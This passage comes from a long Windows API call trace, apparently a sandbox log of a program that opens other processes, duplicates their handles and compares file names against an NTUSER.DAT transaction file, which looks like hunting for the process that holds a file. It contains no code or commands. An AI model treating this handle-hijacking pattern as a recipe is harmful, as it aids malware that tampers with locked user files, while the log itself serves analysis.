returned 5 [0153.759] CloseHandle (hObject=0x680) returned 1 [0153.759] CloseHandle (hObject=0x62c) returned 1 [0153.759] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.759] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.760] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.760] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.760] CloseHandle (hObject=0x670) returned 1 [0153.760] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.760] CloseHandle (hObject=0x680) returned 1 [0153.761] CloseHandle (hObject=0x62c) returned 1 [0153.761] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.761] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.761] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.762] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.762] CloseHandle (hObject=0x670) returned 1 [0153.762] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.762] CloseHandle (hObject=0x680) returned 1 [0153.762] CloseHandle (hObject=0x62c) returned 1 [0153.762] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.762] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.763] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.764] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.764] CloseHandle (hObject=0x670) returned 1 [0153.764] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.764] CloseHandle (hObject=0x680) returned 1 [0153.764] CloseHandle (hObject=0x62c) returned 1 [0153.764] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.764] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.765] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.765] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.766] CloseHandle (hObject=0x670) returned 1 [0153.766] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 1 [0153.766] CloseHandle (hObject=0x680) returned 1 [0153.766] CloseHandle (hObject=0x62c) returned 1 [0153.766] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.766] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.766] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.766] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.767] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.767] CloseHandle (hObject=0x670) returned 1 [0153.767] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.767] CloseHandle (hObject=0x680) returned 1 [0153.767] CloseHandle (hObject=0x62c) returned 1 [0153.767] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.767] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.768] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.770] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.771] CloseHandle (hObject=0x670) returned 1 [0153.771] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.771] CloseHandle (hObject=0x680) returned 1 [0153.771] CloseHandle (hObject=0x62c) returned 1 [0153.771] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.771] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa2c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.771] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.771] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.772] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.772] CloseHandle (hObject=0x670) returned 1 [0153.772] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0153.772] CloseHandle (hObject=0x680) returned 1 [0153.772] CloseHandle (hObject=0x62c) returned 1 [0153.772] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.773] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.773] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.774] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.774] CloseHandle (hObject=0x670) returned 1 [0153.774] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.774] CloseHandle (hObject=0x680) returned 1 [0153.774] CloseHandle (hObject=0x62c) returned 1 [0153.774] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.774] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.775] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.775] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.775] CloseHandle (hObject=0x670) returned 1 [0153.775] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.775] CloseHandle (hObject=0x680) returned 1 [0153.775] CloseHandle (hObject=0x62c) returned 1 [0153.775] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.776] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.776] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.777] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.777] CloseHandle (hObject=0x670) returned 1 [0153.777] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0153.777] CloseHandle (hObject=0x680) returned 1 [0153.777] CloseHandle (hObject=0x62c) returned 1 [0153.777] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.777] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.778] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.779] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.779] CloseHandle (hObject=0x670) returned 1 [0153.779] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.779] CloseHandle (hObject=0x680) returned 1 [0153.779] CloseHandle (hObject=0x62c) returned 1 [0153.779] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.779] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.780] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.780] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.780] CloseHandle (hObject=0x670) returned 1 [0153.780] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.781] CloseHandle (hObject=0x680) returned 1 [0153.781] CloseHandle (hObject=0x62c) returned 1 [0153.781] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.781] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1114, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.781] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.782] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.782] CloseHandle (hObject=0x670) returned 1 [0153.782] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.782] CloseHandle (hObject=0x680) returned 1 [0153.782] CloseHandle (hObject=0x62c) returned 1 [0153.782] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.782] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.783] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.784] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.784] CloseHandle (hObject=0x670) returned 1 [0153.784] CloseHandle (hObject=0x680) returned 1 [0153.784] CloseHandle (hObject=0x62c) returned 1 [0153.784] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.784] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.784] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.785] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.785] CloseHandle (hObject=0x670) returned 1 [0153.785] CloseHandle (hObject=0x680) returned 1 [0153.785] CloseHandle (hObject=0x62c) returned 1 [0153.785] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0153.785] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.786] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.787] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.787] CloseHandle (hObject=0x670) returned 1 [0153.787] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.787] CloseHandle (hObject=0x680) returned 1 [0153.787] CloseHandle (hObject=0x62c) returned 1 [0153.787] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0153.787] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0153.787] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.787] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.788] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.790] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.790] CloseHandle (hObject=0x670) returned 1 [0153.790] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.790] CloseHandle (hObject=0x680) returned 1 [0153.790] CloseHandle (hObject=0x62c) returned 1 [0153.790] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0153.790] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.791] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.792] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.792] CloseHandle (hObject=0x670) returned 1 [0153.792] CloseHandle (hObject=0x680) returned 1 [0153.792] CloseHandle (hObject=0x62c) returned 1 [0153.792] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0153.792] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.793] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.793] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.794] CloseHandle (hObject=0x670) returned 1 [0153.794] CloseHandle (hObject=0x680) returned 1 [0153.794] CloseHandle (hObject=0x62c) returned 1 [0153.794] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0153.794] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.795] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.795] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.796] CloseHandle (hObject=0x670) returned 1 [0153.796] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.796] CloseHandle (hObject=0x680) returned 1 [0153.796] CloseHandle (hObject=0x62c) returned 1 [0153.796] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0153.796] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.796] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.797] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.797] CloseHandle (hObject=0x670) returned 1 [0153.797] _wcsicmp (_Str1="\\es.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.797] CloseHandle (hObject=0x680) returned 1 [0153.797] CloseHandle (hObject=0x62c) returned 1 [0153.797] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0153.797] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.797] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.798] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.798] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.799] CloseHandle (hObject=0x670) returned 1 [0153.799] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.799] CloseHandle (hObject=0x680) returned 1 [0153.799] CloseHandle (hObject=0x62c) returned 1 [0153.799] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.799] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.800] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.801] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.801] CloseHandle (hObject=0x670) returned 1 [0153.801] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.801] CloseHandle (hObject=0x680) returned 1 [0153.801] CloseHandle (hObject=0x62c) returned 1 [0153.801] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.801] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.802] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.802] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.802] CloseHandle (hObject=0x670) returned 1 [0153.802] CloseHandle (hObject=0x680) returned 1 [0153.802] CloseHandle (hObject=0x62c) returned 1 [0153.803] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.803] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.803] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.804] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.804] CloseHandle (hObject=0x670) returned 1 [0153.804] CloseHandle (hObject=0x680) returned 1 [0153.804] CloseHandle (hObject=0x62c) returned 1 [0153.804] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.804] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.805] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.805] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.805] CloseHandle (hObject=0x670) returned 1 [0153.805] _wcsicmp 